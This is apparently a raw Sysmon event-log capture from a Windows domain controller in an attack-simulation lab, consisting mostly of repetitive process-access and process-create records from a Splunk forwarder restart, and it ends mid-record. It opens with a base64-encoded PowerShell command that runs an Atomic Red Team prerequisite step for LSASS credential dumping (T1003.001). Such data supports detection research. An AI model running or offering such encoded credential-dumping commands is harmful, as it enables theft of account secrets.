WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004667Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004666Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004665Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004664Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004663Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004662Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004661Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004660Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004659Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004658Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004657Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004656Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7CD7-5FA1-E900-000000008801}41362548C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d40f|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004655Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.991{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2676C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7CD7-5FA1-E900-000000008801}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2676 10341000x80000000000000004654Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD7-5FA1-E900-000000008801}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004653Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004652Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004651Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004650Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004649Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004648Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004647Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004646Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004645Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004644Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CD7-5FA1-E900-000000008801}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004643Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.976{D28789B6-7C73-5FA1-3300-000000008801}26763988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CD7-5FA1-E900-000000008801}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+77c1aa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+b08def|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd792a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd534e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1a2a848|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004642Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.983{D28789B6-7CD7-5FA1-E900-000000008801}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2676C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000004641Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.945{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\wpcap.dll2020-11-03 15:52:55.945 11241100x80000000000000004640Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.945{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 